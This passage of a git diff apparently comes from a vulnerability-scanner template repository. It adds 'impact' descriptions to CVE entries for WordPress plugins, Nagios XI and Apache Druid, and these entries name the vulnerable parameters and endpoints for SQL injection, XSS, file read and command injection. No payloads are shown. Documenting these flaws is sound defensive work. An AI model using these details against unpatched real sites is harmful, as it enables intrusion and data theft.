Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.7.1.6 reference: - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index b38d486877..8fa8c65aaa 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -5,6 +5,8 @@ info: author: Supras severity: medium description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index f4f4af92d8..b4eff12f39 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -5,6 +5,8 @@ info: author: cckuakilong severity: high description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index f86205bb4b..930e0d9944 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 9562750625..e74a8252ce 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 0101da3f88..732ec7af21 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 0526fe9643..e1af129633 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator. + impact: | + An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 5.0.1.6. reference: - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615 diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index f53d6b8b22..68b318485a 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index c51d552657..e35a23f33e 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index fbe7dc897c..83238bfe9c 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -5,6 +5,8 @@ info: author: Screamy severity: medium description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 24f1c78e7b..91a4cf5855 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: high description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. + impact: | + An attacker can gain sensitive information about the WordPress site, such as the login page URL. remediation: Fixed in version 1.9.1. reference: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 95ad909099..98fa91386e 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 79473b6045..2670d89b05 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in 5.9.8. reference: - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 2c1b45b0b4..a501fe788f 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index caa7b393e6..b3819b488c 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 7f2280bad2..a028d0f8b3 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 5fa6ee4e85..d9e42e6bf0 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Fixed in version 2.5.4. reference: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 8a9bc56191..191afe436b 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 031bf5fbdc..f576824958 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index edea93be49..51c2ad2335 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: medium description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 3f9619324c..17fc8b94a2 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index f2a0e226e6..6761958391 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index addaa72dab..37879ffa41 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. + impact: | + An attacker can trick users into visiting malicious websites, leading to phishing attacks. remediation: | Update to Noptin plugin version 1.6.5 or later. reference: diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 4c593e419e..df23108ba3 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. + impact: | + An attacker can exploit this vulnerability to execute arbitrary code on the target system. remediation: | Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index e75c2df9d8..79cfb2f860 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 66dea422af..0dd3565a99 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 22364bc9ed..985dd314e8 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 9125965f48..9ec7dbd494 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.9.6. reference: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index b202a4b5fe..eee36282f3 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed. reference: diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 9ad31424fd..44ef45ab51 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -6,6 +6,8 @@ info: severity: low description: | WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.1. reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index 3b549083e8..ee2edf61a5 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.9.0 reference: - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 281155b8ef..519e9d5cb3 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 094e8177a7..68e5f34940 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index 94d59a65c9..6831320303 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.9.5. reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index bfabd96388..a28526a088 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities. remediation: | Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 559c3259ce..2239313465 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index e09fcadd57..0e029192fb 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 700e06b021..6756454ae1 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: Fixed in version 17.3. reference: - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 1f45935357..4a5af0001c 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows authenticated attackers to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 50b16d5ca5..2b8263cc57 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios to a version higher than 5.7.5 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 1dc28fc9f5..8f18ea17d7 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary commands on the target system. remediation: | Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 216a63294c..7866b62f8e 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Druid. reference: diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index d1673d2380..8402d27bf3 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Hue Magic 3.0.0 is susceptible to local file 